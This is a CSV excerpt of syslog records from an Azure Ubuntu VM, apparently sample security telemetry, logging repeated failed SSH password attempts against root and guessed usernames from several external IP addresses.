+14399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:10,UbuntuDevEnv,2019-06-26 04:59:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:12,UbuntuDevEnv,2019-06-26 04:59:11,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 18566 ssh2,3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18566,,
+14401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:14,UbuntuDevEnv,2019-06-26 04:59:13,auth,UbuntuDevEnv,info,Invalid user bsnl from 196.41.208.238 port 28581,3801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsnl,196.41.208.2,28581,,
+14402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:14,UbuntuDevEnv,2019-06-26 04:59:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,3801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:14,UbuntuDevEnv,2019-06-26 04:59:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:14,UbuntuDevEnv,2019-06-26 04:59:14,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 18566 ssh2,3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18566,,
+14405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:16,UbuntuDevEnv,2019-06-26 04:59:15,auth,UbuntuDevEnv,info,Failed password for invalid user bsnl from 196.41.208.238 port 28581 ssh2,3801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsnl,196.41.208.2,28581,,
+14406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:16,UbuntuDevEnv,2019-06-26 04:59:15,auth,UbuntuDevEnv,info,Disconnected from invalid user bsnl 196.41.208.238 port 28581 [preauth],3801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsnl,196.41.208.2,28581,,
+14407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:16,UbuntuDevEnv,2019-06-26 04:59:15,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 28581:11: Bye Bye [preauth],3801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,28581,,
+14408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:17,UbuntuDevEnv,2019-06-26 04:59:17,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 18566 ssh2,3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18566,,
+14409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:25,UbuntuDevEnv,2019-06-26 04:59:24,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 18566 ssh2],3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18566,,
+14410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:25,UbuntuDevEnv,2019-06-26 04:59:24,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 18566 ssh2 [preauth],3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18566,,
+14411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:25,UbuntuDevEnv,2019-06-26 04:59:24,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 18566: Too many authentication failures [preauth],3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,18566,,
+14412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:25,UbuntuDevEnv,2019-06-26 04:59:24,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:25,UbuntuDevEnv,2019-06-26 04:59:24,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:28,UbuntuDevEnv,2019-06-26 04:59:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:30,UbuntuDevEnv,2019-06-26 04:59:29,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 24213 ssh2,3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,24213,,
+14416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:39,UbuntuDevEnv,2019-06-26 04:59:38,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 24213 ssh2],3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,24213,,
+14417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:39,UbuntuDevEnv,2019-06-26 04:59:38,auth,UbuntuDevEnv,info,Invalid user default from 177.23.90.10 port 48686,3883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,177.23.90.1,48686,,
+14418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:39,UbuntuDevEnv,2019-06-26 04:59:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:39,UbuntuDevEnv,2019-06-26 04:59:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,3883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:41,UbuntuDevEnv,2019-06-26 04:59:40,auth,UbuntuDevEnv,info,Failed password for invalid user default from 177.23.90.10 port 48686 ssh2,3883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,177.23.90.1,48686,,
+14421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:41,UbuntuDevEnv,2019-06-26 04:59:41,auth,UbuntuDevEnv,info,Disconnected from invalid user default 177.23.90.10 port 48686 [preauth],3883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,177.23.90.1,48686,,
+14422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:41,UbuntuDevEnv,2019-06-26 04:59:41,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 48686:11: Bye Bye [preauth],3883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,48686,,
+14423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:41,UbuntuDevEnv,2019-06-26 04:59:41,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 24213 ssh2,3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,24213,,
+14424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:44,UbuntuDevEnv,2019-06-26 04:59:43,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 24213: Too many authentication failures [preauth],3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,24213,,
+14425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:44,UbuntuDevEnv,2019-06-26 04:59:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 24213 ssh2,3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,24213,,
+14426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:44,UbuntuDevEnv,2019-06-26 04:59:43,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 24213 ssh2 [preauth],3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,24213,,
+14427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:44,UbuntuDevEnv,2019-06-26 04:59:43,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:44,UbuntuDevEnv,2019-06-26 04:59:43,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:47,UbuntuDevEnv,2019-06-26 04:59:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:49,UbuntuDevEnv,2019-06-26 04:59:49,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29978 ssh2,3915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29978,,
+14431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:01,UbuntuDevEnv,2019-06-26 05:00:00,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 29978 ssh2],3915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29978,,
+14432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:02,UbuntuDevEnv,2019-06-26 05:00:01,auth,UbuntuDevEnv,info,Invalid user testuser from 45.55.190.46 port 46138,3887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,45.55.190.4,46138,,
+14433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:02,UbuntuDevEnv,2019-06-26 05:00:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:02,UbuntuDevEnv,2019-06-26 05:00:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,3887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+14435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:04,UbuntuDevEnv,2019-06-26 05:00:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29978 ssh2,3915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29978,,
+14436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:04,UbuntuDevEnv,2019-06-26 05:00:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:04,UbuntuDevEnv,2019-06-26 05:00:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 29978 ssh2 [preauth],3915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29978,,
+14438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:04,UbuntuDevEnv,2019-06-26 05:00:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:04,UbuntuDevEnv,2019-06-26 05:00:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 29978: Too many authentication failures [preauth],3915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,29978,,
+14440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:04,UbuntuDevEnv,2019-06-26 05:00:03,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 45.55.190.46 port 46138 ssh2,3887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,45.55.190.4,46138,,
+14441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:07,UbuntuDevEnv,2019-06-26 05:00:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:08,UbuntuDevEnv,2019-06-26 05:00:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72  user=backup,4030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,5.135.161.7,,0,
+14443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:09,UbuntuDevEnv,2019-06-26 05:00:08,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 35965 ssh2,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,35965,,
+14444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:11,UbuntuDevEnv,2019-06-26 05:00:10,auth,UbuntuDevEnv,info,Failed password for backup from 5.135.161.72 port 34552 ssh2,4030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,34552,,
+14445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:11,UbuntuDevEnv,2019-06-26 05:00:10,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 34552:11: Bye Bye [preauth],4030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,34552,,
+14446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:11,UbuntuDevEnv,2019-06-26 05:00:10,auth,UbuntuDevEnv,info,Disconnected from authenticating user backup 5.135.161.72 port 34552 [preauth],4030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,5.135.161.7,34552,,
+14447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:12,UbuntuDevEnv,2019-06-26 05:00:12,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 35965 ssh2,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,35965,,
+14448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:13,UbuntuDevEnv,2019-06-26 05:00:12,auth,UbuntuDevEnv,info,Disconnected from invalid user testuser 45.55.190.46 port 46138 [preauth],3887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,45.55.190.4,46138,,
+14449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:13,UbuntuDevEnv,2019-06-26 05:00:12,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 46138:11: Bye Bye [preauth],3887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,46138,,
+14450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:14,UbuntuDevEnv,2019-06-26 05:00:13,auth,UbuntuDevEnv,info,Invalid user admin from 200.6.188.38 port 60678,4057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,200.6.188.3,60678,,
+14451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:14,UbuntuDevEnv,2019-06-26 05:00:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,4057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:14,UbuntuDevEnv,2019-06-26 05:00:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:15,UbuntuDevEnv,2019-06-26 05:00:14,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 35965 ssh2,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,35965,,
+14454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:16,UbuntuDevEnv,2019-06-26 05:00:16,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 200.6.188.38 port 60678 ssh2,4057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,200.6.188.3,60678,,
+14455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:16,UbuntuDevEnv,2019-06-26 05:00:16,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 200.6.188.38 port 60678 [preauth],4057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,200.6.188.3,60678,,
+14456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:16,UbuntuDevEnv,2019-06-26 05:00:16,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 60678:11: Bye Bye [preauth],4057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,60678,,
+14457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:17,UbuntuDevEnv,2019-06-26 05:00:17,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 35965 ssh2,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,35965,,
